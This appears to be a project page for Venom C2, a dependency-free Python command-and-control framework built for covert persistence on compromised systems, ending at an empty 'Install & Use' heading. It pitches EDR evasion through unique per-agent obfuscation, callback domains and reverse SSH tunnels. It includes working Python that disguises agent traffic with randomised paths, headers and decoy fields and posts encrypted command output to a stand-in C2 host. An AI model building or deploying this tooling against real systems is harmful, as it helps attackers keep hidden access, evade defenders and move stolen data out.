Venom C2: The Dependency-Free Python Framework for Stealthy Persistence
Venom C2 is a dependency-free Python3 Command & Control framework for red-team persistence, built to run on systems where installing packages is not an option. It comprises a Flask team server, an Electron operator GUI, and a single-file Python agent that communicates over HTTP/HTTPS using configurable AES-encrypted JSON messages. Use it to execute commands, manage files, maintain access, and create SSH reverse tunnels from compromised systems.
Background
While escalating network privileges we landed on many production systems running exotic distros and architectures. We wanted to set up persistence, but our existing arsenal of tools and techniques did not work on them. Additionally, some of the target systems were running EDR.
These were production systems, so we did not want to install packages. We needed a C2 agent that would run without dependencies. The systems had Python3 installed, so I created Venom C2 mid-engagement: a dependency-free Python3 C2 agent that just works.
We didn't want to use off-the-shelf C2 agents because of the risk that the blue team would recognise them. Unique code is king for bypassing modern-day EDRs.
Since there were many systems, we automated unique obfuscation, naming, filesystem placement, network callback domains, and network request paths per agent.
Venom C2 Features
Server
- Python3 Flask
- Team server supporting multiple operators
- Saves command history
- Script for configuring agents
- Script for obfuscating agents
- Manages agent connections
- API for communicating with the GUI client
- Custom profiles with random selection from large arrays of:
  - C2 message parameter names
  - Random headers
  - Random JSON attributes with scalable value types
Client GUI
- Electron
- Works on Linux, macOS, Windows
- GUI is a slimmed-down version of the Loki GUI
Agent
- Python3 without dependencies
- Messages are encrypted using configurable AES keys
- All messages are sent as JSON POST requests
- Custom profiles with random selection from large arrays of:
  - URI base paths (useful for setting up reverse proxy routing)
  - Multiple URI paths for each agent function
  - C2 message parameter names
  - User agents
  - Random headers
  - Random JSON attributes with scalable value types
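The server and agent feature lists above both describe the same idea: every request an agent sends is drawn at random from profile arrays (base path, per-function path, parameter name, user agent, headers, decoy JSON attributes), and the team server has to recover the real message from any shape the profile allows. The following is an added, stand-alone Python 3 example of that mechanism; it is not Venom's code and does not use Venom's real profile or wire format. The profile arrays, the host `c2.example`, the function names `checkin`/`task`/`result` and all helper names are constructed for illustration. Because the Python standard library has no AES, the ciphertext here comes from an HMAC-SHA256 keystream with an HMAC tag as a stand-in for Venom's AES; the point being demonstrated is the profile-driven shaping and the server-side parsing, including the one check that makes it work: decoy attribute names must never collide with real parameter names.

```python
import hashlib
import hmac
import json
import os
import random
from urllib.parse import urlparse

# Hypothetical profile, constructed for this example (not Venom's format).
PROFILE = {
    "base_paths": ["/api/v2", "/static/js", "/cdn/assets"],
    "paths": {
        "checkin": ["/session", "/ping.js", "/health"],
        "task": ["/poll", "/bundle.js", "/status"],
        "result": ["/upload", "/analytics.js", "/report"],
    },
    "param_names": ["data", "payload", "token", "blob"],
    "user_agents": [
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0 Safari/537.36",
        "Mozilla/5.0 (X11; Linux x86_64; rv:115.0) Gecko/20100101 Firefox/115.0",
    ],
    "headers": {
        "Accept-Language": ["en-US,en;q=0.9", "en-GB,en;q=0.8"],
        "X-Requested-With": ["XMLHttpRequest"],
        "Cache-Control": ["no-cache", "max-age=0"],
    },
    # Decoy JSON attributes with a value type chosen per attribute.
    "junk_attrs": {"ts": "int", "ok": "bool", "v": "str", "items": "list"},
}


def validate_profile(profile):
    """A decoy attribute name must never equal a real parameter name, or the
    server cannot tell which body field carries the ciphertext."""
    clash = set(profile["junk_attrs"]) & set(profile["param_names"])
    if clash:
        raise ValueError(f"junk attribute names collide with param names: {clash}")
    return True


def _keystream(key, nonce, length):
    """Stdlib-only stand-in for AES-CTR: HMAC-SHA256 over nonce||counter."""
    out, counter = b"", 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(8, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def encrypt(key, plaintext):
    """Returns hex(nonce || ciphertext || 16-byte HMAC tag)."""
    nonce = os.urandom(16)
    ct = bytes(a ^ b for a, b in zip(plaintext, _keystream(key, nonce, len(plaintext))))
    tag = hmac.new(key, nonce + ct, hashlib.sha256).digest()[:16]
    return (nonce + ct + tag).hex()


def decrypt(key, blob_hex):
    """Verifies the tag before decrypting; raises ValueError on tampering."""
    blob = bytes.fromhex(blob_hex)
    nonce, ct, tag = blob[:16], blob[16:-16], blob[-16:]
    expected = hmac.new(key, nonce + ct, hashlib.sha256).digest()[:16]
    if not hmac.compare_digest(tag, expected):
        raise ValueError("bad tag")
    return bytes(a ^ b for a, b in zip(ct, _keystream(key, nonce, len(ct))))


def _junk_value(kind, rng):
    if kind == "int":
        return rng.randint(1, 10**9)
    if kind == "bool":
        return rng.choice([True, False])
    if kind == "str":
        return "".join(rng.choice("abcdef0123456789") for _ in range(rng.randint(8, 32)))
    if kind == "list":
        return [rng.randint(0, 99) for _ in range(rng.randint(1, 5))]
    raise ValueError(kind)


def build_request(profile, key, func, message, host="c2.example", rng=None):
    """Agent side: one POST whose URL, headers and body shape are drawn from the profile."""
    rng = rng or random.SystemRandom()
    url = "https://" + host + rng.choice(profile["base_paths"]) + rng.choice(profile["paths"][func])
    headers = {"User-Agent": rng.choice(profile["user_agents"]), "Content-Type": "application/json"}
    for name, values in profile["headers"].items():
        if rng.random() < 0.5:          # each optional header appears on about half of requests
            headers[name] = rng.choice(values)
    body = {n: _junk_value(k, rng) for n, k in profile["junk_attrs"].items() if rng.random() < 0.7}
    body[rng.choice(profile["param_names"])] = encrypt(key, json.dumps(message).encode())
    items = list(body.items())
    rng.shuffle(items)                   # real field sits at a random position among decoys
    return {"method": "POST", "url": url, "headers": headers, "body": json.dumps(dict(items))}


def parse_request(profile, key, url, body):
    """Server side: recover (function, message) from any request shape the profile allows."""
    path = urlparse(url).path
    func = None
    for base in profile["base_paths"]:
        for name, paths in profile["paths"].items():
            if any(path == base + p for p in paths):
                func = name
    if func is None:
        raise ValueError("path not in profile")
    fields = json.loads(body)
    carriers = [k for k in fields if k in profile["param_names"]]
    if len(carriers) != 1:
        raise ValueError("expected exactly one payload field")
    return func, json.loads(decrypt(key, fields[carriers[0]]))


if __name__ == "__main__":
    validate_profile(PROFILE)
    k = os.urandom(32)
    req = build_request(PROFILE, k, "result", {"id": 7, "out": "uid=0(root)"})
    print(req["url"], req["headers"], req["body"], sep="\n")
    print(parse_request(PROFILE, k, req["url"], req["body"]))
```

Two things this shows beyond the feature list: the server can only parse what the profile enumerates, so every base path the agent may pick must be routed through to the team server (which is why the page notes that base paths help with reverse-proxy routing), and any decoy attribute that shares a name with a real parameter makes the request ambiguous, so the profile has to be validated for that collision before agents are built from it.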
Install & Use